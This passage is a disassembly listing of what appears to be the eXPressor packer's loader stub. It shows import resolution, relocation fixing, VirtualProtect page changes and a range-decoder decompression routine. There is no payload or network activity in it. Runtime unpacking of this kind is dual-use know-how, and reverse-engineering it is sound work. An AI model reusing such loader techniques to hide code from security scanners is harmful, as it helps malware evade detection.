and [ebp+var_270], 0
loc_5218EE: ; CODE XREF: start+3FB�j
mov eax, [ebp+var_270]
mov [ebp+var_25C], eax
cmp [ebp+var_25C], 0
jnz short loc_521949
mov eax, [ebp+var_238]
imul eax, 18h
mov ecx, ds:off_521024
mov ecx, [ecx+eax+98h]
mov esi, [ebp+var_240]
mov eax, [ebp+var_238]
imul eax, 18h
mov edx, ds:off_521024
mov edi, ds:dword_521028
add edi, [edx+eax+9Ch]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
loc_521949: ; CODE XREF: start+417�j
mov eax, [ebp+var_238]
imul eax, 18h
mov ecx, ds:off_521024
mov edx, [ebp+var_240]
add edx, [ecx+eax+98h]
mov [ebp+var_240], edx
jmp loc_52187D
; ---------------------------------------------------------------------------
loc_521970: ; CODE XREF: start+3B2�j
push 8000h
push 0
push [ebp+var_248]
call ds:dword_52110C ; VirtualFree
jmp loc_521B14
; ---------------------------------------------------------------------------
loc_521988: ; CODE XREF: start+2E5�j
mov eax, ds:off_521024
mov ecx, ds:dword_521028
add ecx, [eax+58h]
mov eax, ds:off_521024
sub ecx, [eax+54h]
mov eax, ds:off_521024
mov esi, [ebp+var_230]
mov eax, [eax+94h]
xor edx, edx
div dword ptr [esi+3Ch]
add ecx, edx
mov [ebp+var_248], ecx
and [ebp+var_238], 0
jmp short loc_5219D2
; ---------------------------------------------------------------------------
loc_5219C5: ; CODE XREF: start:loc_521B0F�j
mov eax, [ebp+var_238]
inc eax
mov [ebp+var_238], eax
loc_5219D2: ; CODE XREF: start+4D9�j
mov eax, ds:off_521024
movzx eax, word ptr [eax+8Ch]
cmp [ebp+var_238], eax
jge loc_521B14
mov eax, [ebp+var_238]
imul eax, 18h
mov ecx, ds:off_521024
cmp dword ptr [ecx+eax+90h], 0
jz loc_521B0F
mov eax, [ebp+var_238]
imul eax, 18h
mov ecx, ds:off_521024
cmp dword ptr [ecx+eax+98h], 0
jbe loc_521B0F
mov eax, [ebp+var_238]
imul eax, 18h
mov ecx, ds:off_521024
mov edx, ds:dword_521028
add edx, [ecx+eax+9Ch]
mov [ebp+var_240], edx
mov eax, [ebp+var_238]
imul eax, 18h
mov ecx, ds:off_521024
mov eax, [ecx+eax+98h]
mov [ebp+var_234], eax
mov eax, [ebp+var_238]
imul eax, 18h
mov ecx, ds:off_521024
mov edx, [ebp+var_248]
add edx, [ecx+eax+94h]
mov [ebp+var_21C], edx
cmp [ebp+var_228], 0
jz short loc_521AC9
mov eax, ds:off_521024
mov eax, [eax+4]
and eax, 2000000h
test eax, eax
jz short loc_521AC9
mov eax, [ebp+var_238]
imul eax, 18h
mov ecx, ds:off_521024
mov eax, [ecx+eax+0A4h]
and eax, 10000000h
test eax, eax
jz short loc_521AC9
mov [ebp+var_274], 1
jmp short loc_521AD0
; ---------------------------------------------------------------------------
loc_521AC9: ; CODE XREF: start+5A1�j start+5B2�j ...
and [ebp+var_274], 0
loc_521AD0: ; CODE XREF: start+5DD�j
mov eax, [ebp+var_274]
mov [ebp+var_260], eax
cmp [ebp+var_260], 0
jnz short loc_521B0F
push [ebp+var_240]
mov eax, [ebp+var_238]
imul eax, 18h
mov ecx, ds:off_521024
push dword ptr [ecx+eax+98h]
push [ebp+var_21C]
call sub_521402
add esp, 0Ch
loc_521B0F: ; CODE XREF: start+517�j start+534�j ...
jmp loc_5219C5
; ---------------------------------------------------------------------------
loc_521B14: ; CODE XREF: start+499�j start+4FA�j
mov eax, ds:off_521024
mov ecx, ds:dword_521028
add ecx, [eax+70h]
mov [ebp+var_24C], ecx
and [ebp+var_224], 0
loc_521B2F: ; CODE XREF: start+967�j
mov eax, [ebp+var_24C]
cmp dword ptr [eax+0Ch], 0
jz loc_521E56
mov eax, ds:off_521024
cmp dword ptr [eax+70h], 0
jz loc_521E56
and [ebp+var_264], 0
lea eax, [ebp+var_23C]
push eax
push 40h
push 14h
push [ebp+var_24C]
call ds:dword_521124 ; VirtualProtect
mov eax, [ebp+var_24C]
mov ecx, ds:dword_521028
add ecx, [eax+0Ch]
mov [ebp+var_10C], ecx
push [ebp+var_10C]
call ds:dword_521120 ; GetModuleHandleA
mov [ebp+var_244], eax
cmp [ebp+var_244], 0
jnz short loc_521BC5
push 8
push 0
push [ebp+var_10C]
call ds:dword_52111C ; LoadLibraryExA
mov [ebp+var_244], eax
cmp [ebp+var_244], 0
jz short loc_521BC5
mov [ebp+var_264], 1
loc_521BC5: ; CODE XREF: start+6B0�j start+6CF�j
cmp [ebp+var_244], 0
jnz short loc_521C2A
mov edi, [ebp+var_10C]
mov eax, [ebp+var_254]
lea eax, [ebp+eax+var_104]
mov edx, eax
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov eax, ecx
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
push 8
push 0
lea eax, [ebp+var_104]
push eax
call ds:dword_52111C ; LoadLibraryExA
mov [ebp+var_244], eax
cmp [ebp+var_244], 0
jz short loc_521C2A
mov [ebp+var_264], 1
loc_521C2A: ; CODE XREF: start+6E2�j start+734�j
cmp [ebp+var_244], 0
jnz short loc_521C6C
push [ebp+var_10C]
push 4
call sub_522F84
pop ecx
push eax
push [ebp+var_218]
call ds:dword_521140 ; wsprintfA
add esp, 0Ch
push 30h
push [ebp+var_22C]
push [ebp+var_218]
push 0
call ds:dword_521144 ; MessageBoxA
jmp loc_522050
; ---------------------------------------------------------------------------
loc_521C6C: ; CODE XREF: start+747�j
cmp [ebp+var_264], 0
jz short loc_521CA0
cmp ds:dword_521040, 0
jz short loc_521CA0
mov eax, [ebp+var_224]
mov ecx, ds:dword_521040
mov edx, [ebp+var_244]
mov [ecx+eax*4], edx
mov eax, [ebp+var_224]
inc eax
mov [ebp+var_224], eax
loc_521CA0: ; CODE XREF: start+789�j start+792�j
mov eax, [ebp+var_24C]
mov ecx, ds:dword_521028
add ecx, [eax+10h]
mov [ebp+var_220], ecx
mov eax, [ebp+var_24C]
cmp dword ptr [eax], 0
jnz short loc_521CCE
mov eax, [ebp+var_220]
mov [ebp-214h], eax
jmp short loc_521CE2
; ---------------------------------------------------------------------------
loc_521CCE: ; CODE XREF: start+7D4�j
mov eax, [ebp+var_24C]
mov ecx, ds:dword_521028
add ecx, [eax]
mov [ebp-214h], ecx
loc_521CE2: ; CODE XREF: start+7E2�j start+953�j
mov eax, [ebp-214h]
cmp dword ptr [eax], 0
jz loc_521E42
and [ebp+var_268], 0
mov eax, [ebp-214h]
mov eax, [eax]
and eax, 80000000h
test eax, eax
jz short loc_521D2E
mov eax, [ebp-214h]
mov eax, [eax]
and eax, 0FFFFh
movzx eax, ax
push eax
push [ebp+var_244]
call ds:dword_521118 ; GetProcAddress
mov [ebp+var_268], eax
jmp short loc_521D5D
; ---------------------------------------------------------------------------
loc_521D2E: ; CODE XREF: start+81D�j
mov eax, [ebp-214h]
mov eax, [eax]
add eax, ds:dword_521028
mov [ebp+var_108], eax
mov eax, [ebp+var_108]
inc eax
inc eax
push eax
push [ebp+var_244]
call ds:dword_521118 ; GetProcAddress
mov [ebp+var_268], eax
loc_521D5D: ; CODE XREF: start+842�j
cmp [ebp+var_268], 0
jnz loc_521DFA
mov eax, [ebp-214h]
mov eax, [eax]
and eax, 80000000h
test eax, eax
jz short loc_521DB2
mov eax, [ebp-214h]
mov eax, [eax]
and eax, 0FFFFh
movzx eax, ax
push eax
push [ebp+var_10C]
push [ebp+var_22C]
push 5
call sub_522F84
pop ecx
push eax
push [ebp+var_218]
call ds:dword_521140 ; wsprintfA
add esp, 14h
jmp short loc_521DDF
; ---------------------------------------------------------------------------
loc_521DB2: ; CODE XREF: start+88F�j
mov eax, [ebp+var_108]
inc eax
inc eax
push eax
push [ebp+var_10C]
push [ebp+var_22C]
push 6
call sub_522F84
pop ecx
push eax
push [ebp+var_218]
call ds:dword_521140 ; wsprintfA
add esp, 14h
loc_521DDF: ; CODE XREF: start+8C6�j
push 30h
push [ebp+var_22C]
push [ebp+var_218]
push 0
call ds:dword_521144 ; MessageBoxA
jmp loc_52204E
; ---------------------------------------------------------------------------
loc_521DFA: ; CODE XREF: start+87A�j
lea eax, [ebp+var_23C]
push eax
push 40h
push 4
push [ebp+var_220]
call ds:dword_521124 ; VirtualProtect
mov eax, [ebp+var_220]
mov ecx, [ebp+var_268]
mov [eax], ecx
mov eax, [ebp-214h]
add eax, 4
mov [ebp-214h], eax
mov eax, [ebp+var_220]
add eax, 4
mov [ebp+var_220], eax
jmp loc_521CE2
; ---------------------------------------------------------------------------
loc_521E42: ; CODE XREF: start+801�j
mov eax, [ebp+var_24C]
add eax, 14h
mov [ebp+var_24C], eax
jmp loc_521B2F
; ---------------------------------------------------------------------------
loc_521E56: ; CODE XREF: start+64F�j start+65E�j
call sub_5220B6
test eax, eax
jnz short loc_521E91
push 7
call sub_522F84
pop ecx
push eax
push [ebp+var_218]
call ds:dword_521140 ; wsprintfA
pop ecx
pop ecx
push 10h
push [ebp+var_22C]
push [ebp+var_218]
push 0
call ds:dword_521144 ; MessageBoxA
jmp loc_52204C
; ---------------------------------------------------------------------------
loc_521E91: ; CODE XREF: start+973�j
mov eax, ds:off_521024
cmp dword ptr [eax+7Ch], 0
jz short loc_521EA1
call sub_5221F7
loc_521EA1: ; CODE XREF: start+9B0�j
mov eax, ds:off_521024
mov ecx, ds:dword_521028
add ecx, [eax+5Ch]
mov ds:dword_52103C, ecx
lea eax, [ebp+var_23C]
push eax
push 40h
push 1000h
push ds:dword_521028
call ds:dword_521124 ; VirtualProtect
mov eax, [ebp+var_230]
movzx eax, word ptr [eax+14h]
mov ecx, [ebp+var_230]
lea eax, [ecx+eax+18h]
mov [ebp+var_258], eax
mov eax, [ebp+var_258]
mov eax, [eax+24h]
and eax, 80000000h
test eax, eax
jz short loc_521F20
mov eax, [ebp+var_258]
add eax, 24h
mov [ebp+var_26C], eax
mov eax, [ebp+var_258]
mov eax, [eax+24h]
sub eax, 80000000h
mov ecx, [ebp+var_26C]
mov [ecx], eax
loc_521F20: ; CODE XREF: start+A0F�j
push 0
push [ebp+var_23C]
push 1000h
push ds:dword_521028
call ds:dword_521124 ; VirtualProtect
loc_521F39: ; CODE XREF: start+8F�j
mov eax, ds:off_521024
mov eax, [eax+4]
and eax, 80000000h
test eax, eax
jz short loc_521FB1
cmp [ebp+arg_4], 0
jnz short loc_521FB1
cmp [ebp+var_218], 0
jz short loc_521F6C
push 8000h
push 0
push [ebp+var_218]
call ds:dword_52110C ; VirtualFree
loc_521F6C: ; CODE XREF: start+A6D�j
cmp ds:dword_521030, 0
jz short loc_521F88
push 8000h
push 0
push ds:dword_521030
call ds:dword_52110C ; VirtualFree
loc_521F88: ; CODE XREF: start+A89�j
mov eax, ds:off_521024
cmp dword ptr [eax+5Ch], 0
jz short loc_521FA5
push [ebp+arg_8]
push [ebp+arg_4]
push ds:dword_521034
call ds:dword_52103C
loc_521FA5: ; CODE XREF: start+AA7�j
call sub_522069
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
loc_521FB1: ; CODE XREF: start+A5E�j start+A64�j
mov eax, ds:dword_52103C
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
push eax
mov eax, ds:off_521024
cmp dword ptr [eax+5Ch], 0
jnz short loc_521FCD
pop eax
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_521FCD: ; CODE XREF: start+ADC�j
pop eax
jmp eax
; ---------------------------------------------------------------------------
loc_521FD0: ; CODE XREF: start:loc_52204C�j
; start:loc_52204E�j ...
mov eax, ds:off_521024
mov eax, [eax+4]
and eax, 80000000h
test eax, eax
jz short loc_522044
cmp [ebp+arg_4], 1
jnz short loc_521FFA
mov ds:dword_521038, 1
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_521FFA: ; CODE XREF: start+AFB�j
cmp [ebp+arg_4], 0
jnz short loc_522044
cmp [ebp+var_218], 0
jz short loc_52201C
push 8000h
push 0
push [ebp+var_218]
call ds:dword_52110C ; VirtualFree
loc_52201C: ; CODE XREF: start+B1D�j
cmp ds:dword_521030, 0
jz short loc_522038
push 8000h
push 0
push ds:dword_521030
call ds:dword_52110C ; VirtualFree
loc_522038: ; CODE XREF: start+B39�j
call sub_522069
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
loc_522044: ; CODE XREF: start+AF5�j start+B14�j
push 0
call ds:dword_521114 ; ExitProcess
loc_52204C: ; CODE XREF: start+9A2�j
jmp short loc_521FD0
; ---------------------------------------------------------------------------
loc_52204E: ; CODE XREF: start+90B�j
jmp short loc_521FD0
; ---------------------------------------------------------------------------
loc_522050: ; CODE XREF: start+77D�j
jmp loc_521FD0
; ---------------------------------------------------------------------------
loc_522055: ; CODE XREF: start+336�j
jmp loc_521FD0
; ---------------------------------------------------------------------------
loc_52205A: ; CODE XREF: start:loc_5217BE�j
jmp loc_521FD0
; ---------------------------------------------------------------------------
loc_52205F: ; CODE XREF: start+1E1�j
jmp loc_521FD0
; ---------------------------------------------------------------------------
loc_522064: ; CODE XREF: start+81�j
jmp loc_521FD0
start endp
; =============== S U B R O U T I N E =======================================
sub_522069 proc near ; CODE XREF: start:loc_521FA5�p
; start:loc_522038�p
mov eax, ds:dword_521040
push edi
xor edi, edi
test eax, eax
jz short loc_5220B4
cmp [eax], edi
jz short loc_5220A2
mov ecx, [eax]
push esi
xor esi, esi
loc_52207E: ; CODE XREF: sub_522069+36�j
push ecx
call ds:dword_52112C ; FreeLibrary
mov eax, ds:dword_521040
and dword ptr [esi+eax], 0
mov eax, ds:dword_521040
inc edi
movzx esi, di
shl esi, 2
mov ecx, [esi+eax]
test ecx, ecx
jnz short loc_52207E
pop esi
loc_5220A2: ; CODE XREF: sub_522069+E�j
test eax, eax
jz short loc_5220B4
push 8000h
push 0
push eax
call ds:dword_52110C ; VirtualFree
loc_5220B4: ; CODE XREF: sub_522069+A�j
; sub_522069+3B�j
pop edi
retn
sub_522069 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_5220B6 proc near ; CODE XREF: start:loc_521E56�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 10h
mov ecx, ds:dword_521028
push ebx
push esi
push edi
mov eax, [ecx+3Ch]
add eax, ecx
mov [ebp+var_10], eax
mov eax, ds:off_521024
cmp [eax+68h], ecx
jz loc_52218D
mov eax, [eax+74h]
test eax, eax
jz loc_52218D
lea edi, [eax+ecx]
loc_5220E9: ; CODE XREF: sub_5220B6+CE�j
cmp dword ptr [edi], 0
jz loc_52218D
lea eax, [edi+8]
and [ebp+var_8], 0
mov [ebp+var_4], eax
mov eax, [edi+4]
sub eax, 8
cdq
sub eax, edx
sar eax, 1
test eax, eax
jle short loc_522181
loc_52210B: ; CODE XREF: sub_5220B6+C9�j
mov eax, [ebp+var_4]
movzx eax, word ptr [eax]
mov esi, eax
and esi, 0FFFh
add esi, [edi]
add esi, ecx
shr eax, 0Ch
jz short loc_52216A
cmp eax, 3
jnz short loc_522189
mov eax, ds:off_521024
mov ebx, [esi]
sub ebx, [eax+68h]
add ebx, ecx
cmp ebx, ecx
jb short loc_522189
mov eax, [ebp+var_10]
mov eax, [eax+50h]
add eax, ecx
cmp ebx, eax
ja short loc_522189
lea eax, [ebp+var_C]
push eax
push 40h
push 4
push esi
call ds:dword_521124 ; VirtualProtect
lea eax, [ebp+var_C]
mov [esi], ebx
push eax
push [ebp+var_C]
push 4
push esi
call ds:dword_521124 ; VirtualProtect
mov ecx, ds:dword_521028
loc_52216A: ; CODE XREF: sub_5220B6+6A�j
mov eax, [edi+4]
add [ebp+var_4], 2
inc [ebp+var_8]
sub eax, 8
cdq
sub eax, edx
sar eax, 1
cmp [ebp+var_8], eax
jl short loc_52210B
loc_522181: ; CODE XREF: sub_5220B6+53�j
add edi, [edi+4]
jmp loc_5220E9
; ---------------------------------------------------------------------------
loc_522189: ; CODE XREF: sub_5220B6+6F�j
; sub_5220B6+7F�j ...
xor eax, eax
jmp short loc_522190
; ---------------------------------------------------------------------------
loc_52218D: ; CODE XREF: sub_5220B6+1F�j
; sub_5220B6+2A�j ...
push 1
pop eax
loc_522190: ; CODE XREF: sub_5220B6+D5�j
pop edi
pop esi
pop ebx
leave
retn
sub_5220B6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_522195 proc near ; CODE XREF: sub_5221F7+A5�p
; DATA XREF: .ex_cod:00521004�o
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cmp ds:dword_521010, 0
push esi
jz short loc_5221D0
mov eax, ds:off_521024
mov ecx, [eax+20h]
sub ecx, [eax+64h]
add ecx, offset start
mov esi, [ecx+0Ch]
test esi, esi
jz short loc_5221F2
loc_5221BA: ; CODE XREF: sub_522195+39�j
mov eax, [esi]
test eax, eax
jz short loc_5221F2
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call eax
add esi, 4
jmp short loc_5221BA
; ---------------------------------------------------------------------------
loc_5221D0: ; CODE XREF: sub_522195+B�j
mov eax, [ebp+arg_0]
mov ds:dword_521014, 1
mov ds:dword_521018, eax
mov eax, [ebp+arg_4]
mov ds:dword_52101C, eax
mov eax, [ebp+arg_8]
mov ds:dword_521020, eax
loc_5221F2: ; CODE XREF: sub_522195+23�j
; sub_522195+29�j
pop esi
pop ebp
retn 0Ch
sub_522195 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_5221F7 proc near ; CODE XREF: start+9B2�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov eax, ds:off_521024
cmp dword ptr [eax+7Ch], 0
jz short loc_522277
cmp ds:dword_52100C, 0FFFFFFFFh
jz short loc_522277
push ebx
push esi
push edi
mov ecx, ds:dword_52100C
mov edx, large fs:2Ch
mov ecx, [edx+ecx*4]
mov [ebp+var_4], ecx
mov ecx, ds:off_521024
mov edx, ds:dword_52100C
mov edi, [ebp+var_4]
mov eax, [ecx+20h]
sub eax, [ecx+64h]
add eax, offset start
mov ecx, [eax+8]
mov [ecx], edx
mov esi, [eax]
mov edx, [eax+4]
sub edx, esi
mov ecx, edx
mov ebx, ecx
shr ecx, 2
rep movsd
mov ecx, ebx
and ecx, 3
rep movsb
mov esi, [ebp+var_4]
mov ecx, [eax+10h]
xor eax, eax
lea edi, [edx+esi]
mov edx, ecx
shr ecx, 2
rep stosd
mov ecx, edx
and ecx, 3
rep stosb
pop edi
pop esi
pop ebx
loc_522277: ; CODE XREF: sub_5221F7+D�j
; sub_5221F7+16�j
cmp ds:dword_521014, 0
mov ds:dword_521010, 1
jz short locret_5222A1
push ds:dword_521020
push ds:dword_52101C
push ds:dword_521018
call sub_522195
locret_5222A1: ; CODE XREF: sub_5221F7+91�j
leave
retn
sub_5221F7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_5222A3 proc near ; CODE XREF: start:loc_52168D�p
var_84 = byte ptr -84h
var_20 = byte ptr -20h
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 84h
push ebx
push esi
push edi
push 6
pop ecx
mov esi, offset aExpressor_inst ; "eXPressor_InstanceChecker_"
lea edi, [ebp+var_20]
xor eax, eax
rep movsd
movsw
movsb
lea edi, [ebp+var_20]
or ecx, 0FFFFFFFFh
repne scasb
mov eax, ds:off_521024
lea esi, [ebp+var_20]
not ecx
dec ecx
lea ebx, [eax+24h]
mov edx, ecx
mov edi, ebx
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
lea edi, [ebp+var_84]
mov [ebp+var_4], ecx
mov ecx, edx
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
mov eax, [ebp+var_4]
and ecx, 3
rep movsb
mov ecx, eax
mov esi, ebx
mov ebx, ecx
lea edi, [ebp+edx+var_84]
shr ecx, 2
rep movsd
mov ecx, ebx
and ecx, 3
rep movsb
lea ecx, [eax+edx]
xor eax, eax
mov [ebp+ecx+var_84], al
lea ecx, [ebp+var_84]
push ecx
push eax
push eax
call ds:dword_521134 ; CreateMutexA
pop edi
pop esi
test eax, eax
pop ebx
jz short loc_52234E
call ds:dword_521130 ; RtlGetLastWin32Error
cmp eax, 0B7h
jnz short loc_52234E
push 1
pop eax
leave
retn
; ---------------------------------------------------------------------------
loc_52234E: ; CODE XREF: sub_5222A3+97�j
; sub_5222A3+A4�j
xor eax, eax
leave
retn
sub_5222A3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_522352 proc near ; CODE XREF: sub_521402+CA�p
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_B = byte ptr -0Bh
var_A = byte ptr -0Ah
var_9 = byte ptr -9
var_8 = byte ptr -8
var_7 = byte ptr -7
var_6 = byte ptr -6
var_5 = byte ptr -5
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 2Ch
push ebx
push esi
push edi
push 1
mov esi, [ebp+arg_C]
pop ecx
mov [ebp+var_2C], ecx
mov [ebp+var_28], ecx
mov [ebp+var_24], ecx
xor eax, eax
and [ebp+var_C], al
mov [ebp+var_1C], ecx
mov [ebp+var_B], cl
mov ecx, [ebp+arg_4]
add ecx, 0FFFFFFFBh
mov [ebp+var_20], eax
mov [ebp+var_18], eax
mov [ebp+var_14], eax
mov [ebp+var_10], eax
mov [ebp+var_A], 2
mov [ebp+var_9], 2
mov [ebp+var_8], 3
mov [ebp+var_7], 3
mov [ebp+var_6], 3
mov [ebp+var_5], 3
mov [ebp+var_4], ecx
loc_5223A2: ; CODE XREF: sub_522352+16F�j
mov edi, [ebp+arg_0]
mov cl, [eax+edi]
cmp cl, 0E8h
jz short loc_5223B8
cmp cl, 0E9h
jz short loc_5223B8
inc eax
jmp loc_5224BE
; ---------------------------------------------------------------------------
loc_5223B8: ; CODE XREF: sub_522352+59�j
; sub_522352+5E�j
mov edx, [ebp+arg_10]
mov ebx, [ebp+arg_8]
mov ecx, eax
sub ecx, [edx]
add ecx, ebx
add ebx, eax
cmp ecx, 5
mov [edx], ebx
jbe short loc_5223D2
and dword ptr [esi], 0
jmp short loc_5223E2
; ---------------------------------------------------------------------------
loc_5223D2: ; CODE XREF: sub_522352+79�j
test ecx, ecx
jbe short loc_5223E2
loc_5223D6: ; CODE XREF: sub_522352+8E�j
mov edx, [esi]
and edx, 77h
shl edx, 1
dec ecx
mov [esi], edx
jnz short loc_5223D6
loc_5223E2: ; CODE XREF: sub_522352+7E�j
; sub_522352+82�j
mov dl, [eax+edi+4]
test dl, dl
jz short loc_5223F3
cmp dl, 0FFh
jnz loc_5224AA
loc_5223F3: ; CODE XREF: sub_522352+96�j
mov ecx, [esi]
mov [ebp+arg_4], ecx
shr [ebp+arg_4], 1
mov ebx, [ebp+arg_4]
and ebx, 7
cmp [ebp+ebx*4+var_2C], 0
jz loc_5224AA
and ecx, 0FFFFFFFEh
cmp ecx, 20h
jnb loc_5224AA
xor ecx, ecx
mov ch, dl
mov cl, [eax+edi+3]
movzx edx, byte ptr [eax+edi+2]
shl ecx, 8
or ecx, edx
movzx edx, byte ptr [eax+edi+1]
shl ecx, 8
or edx, ecx
loc_522434: ; CODE XREF: sub_522352+125�j
sub edx, eax
sub edx, [ebp+arg_8]
sub edx, 5
cmp dword ptr [esi], 0
mov ebx, edx
jz short loc_52247C
mov ecx, [ebp+arg_4]
push 18h
movzx edi, [ebp+ecx+var_C]
mov ecx, edi
shl ecx, 3
mov edx, ecx
pop ecx
sub ecx, edx
mov edx, ebx
shr edx, cl
test dl, dl
jz short loc_522464
cmp dl, 0FFh
jnz short loc_522479
loc_522464: ; CODE XREF: sub_522352+10B�j
push 4
pop ecx
sub ecx, edi
push 1
shl ecx, 3
pop edx
mov edi, [ebp+arg_0]
shl edx, cl
dec edx
xor edx, ebx
jmp short loc_522434
; ---------------------------------------------------------------------------
loc_522479: ; CODE XREF: sub_522352+110�j
mov edi, [ebp+arg_0]
loc_52247C: ; CODE XREF: sub_522352+EF�j
mov ecx, ebx
add eax, 5
shr ecx, 18h
and cl, 1
dec cl
not cl
mov [eax+edi-1], cl
mov ecx, ebx
shr ecx, 10h
mov [eax+edi-2], cl
mov ecx, ebx
shr ecx, 8
mov [eax+edi-3], cl
mov [eax+edi-4], bl
and dword ptr [esi], 0
jmp short loc_5224BE
; ---------------------------------------------------------------------------
loc_5224AA: ; CODE XREF: sub_522352+9B�j
; sub_522352+B4�j ...
or dword ptr [esi], 1
mov ecx, [esi]
inc eax
test dl, dl
jz short loc_5224B9
cmp dl, 0FFh
jnz short loc_5224BE
loc_5224B9: ; CODE XREF: sub_522352+160�j
or ecx, 10h
mov [esi], ecx
loc_5224BE: ; CODE XREF: sub_522352+61�j
; sub_522352+156�j ...
cmp eax, [ebp+var_4]
jbe loc_5223A2
pop edi
pop esi
pop ebx
leave
retn
sub_522352 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_5224CC proc near ; CODE XREF: sub_52275F+309�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov ecx, [ebp+arg_0]
mov edx, [ebp+arg_4]
push esi
xor eax, eax
mov esi, [ecx+8]
push edi
mov edi, [ecx+0Ch]
test edx, edx
jle short loc_522524
push ebx
mov [ebp+arg_0], edx
loc_5224E7: ; CODE XREF: sub_5224CC+55�j
shr esi, 1
shl eax, 1
cmp edi, esi
jb short loc_5224F3
sub edi, esi
or al, 1
loc_5224F3: ; CODE XREF: sub_5224CC+21�j
cmp esi, 1000000h
jnb short loc_52251E
mov edx, [ecx]
shl esi, 8
cmp edx, [ecx+4]
jnz short loc_522511
mov dword ptr [ecx+10h], 1
or bl, 0FFh
jmp short loc_522516
; ---------------------------------------------------------------------------
loc_522511: ; CODE XREF: sub_5224CC+37�j
mov bl, [edx]
inc edx
mov [ecx], edx
loc_522516: ; CODE XREF: sub_5224CC+43�j
movzx edx, bl
shl edi, 8
or edi, edx
loc_52251E: ; CODE XREF: sub_5224CC+2D�j
dec [ebp+arg_0]
jnz short loc_5224E7
pop ebx
loc_522524: ; CODE XREF: sub_5224CC+15�j
mov [ecx+0Ch], edi
mov [ecx+8], esi
pop edi
pop esi
pop ebp
retn
sub_5224CC endp
; =============== S U B R O U T I N E =======================================
sub_52252E proc near ; CODE XREF: sub_5225F3+1D�p
; sub_52262A+1E�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_4]
mov edx, [esp+arg_0]
push esi
push edi
mov eax, [ecx+8]
movzx esi, word ptr [edx]
mov edi, eax
shr edi, 0Bh
imul edi, esi
mov esi, [ecx+0Ch]
cmp esi, edi
jnb short loc_52259F
mov [ecx+8], edi
mov ax, [edx]
movzx esi, ax
mov edi, 800h
sub edi, esi
sar edi, 5
add edi, eax
mov [edx], di
mov eax, [ecx+8]
cmp eax, 1000000h
jnb short loc_52259B
mov esi, [ecx]
cmp esi, [ecx+4]
jnz short loc_522582
mov dword ptr [ecx+10h], 1
or dl, 0FFh
jmp short loc_522587
; ---------------------------------------------------------------------------
loc_522582: ; CODE XREF: sub_52252E+46�j
mov dl, [esi]
inc esi
mov [ecx], esi
loc_522587: ; CODE XREF: sub_52252E+52�j
mov esi, [ecx+0Ch]
movzx edx, dl
shl esi, 8
or esi, edx
shl eax, 8
mov [ecx+0Ch], esi
mov [ecx+8], eax
loc_52259B: ; CODE XREF: sub_52252E+3F�j
xor eax, eax
jmp short loc_5225F0
; ---------------------------------------------------------------------------
loc_52259F: ; CODE XREF: sub_52252E+1D�j
sub eax, edi
sub esi, edi
mov [ecx+8], eax
mov [ecx+0Ch], esi
mov ax, [edx]
push 1
mov si, ax
shr si, 5
sub eax, esi
mov [edx], ax
mov edx, [ecx+8]
cmp edx, 1000000h
pop eax
jnb short loc_5225F0
mov esi, [ecx]
push ebx
cmp esi, [ecx+4]
jnz short loc_5225D6
mov [ecx+10h], eax
or bl, 0FFh
jmp short loc_5225DB
; ---------------------------------------------------------------------------
loc_5225D6: ; CODE XREF: sub_52252E+9E�j
mov bl, [esi]
inc esi
mov [ecx], esi
loc_5225DB: ; CODE XREF: sub_52252E+A6�j
mov esi, [ecx+0Ch]
movzx edi, bl
shl esi, 8
or esi, edi
pop ebx
shl edx, 8
mov [ecx+0Ch], esi
mov [ecx+8], edx
loc_5225F0: ; CODE XREF: sub_52252E+6F�j
; sub_52252E+96�j
pop edi
pop esi
retn
sub_52252E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_5225F3 proc near ; CODE XREF: sub_5226EA+26�p
; sub_5226EA+51�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cmp [ebp+arg_4], 0
push 1
pop eax
jle short loc_52261E
push esi
push edi
mov edi, [ebp+arg_4]
loc_522604: ; CODE XREF: sub_5225F3+27�j
push [ebp+arg_8]
lea esi, [eax+eax]
mov eax, [ebp+arg_0]
add eax, esi
push eax
call sub_52252E
pop ecx
add eax, esi
dec edi
pop ecx
jnz short loc_522604
pop edi
pop esi
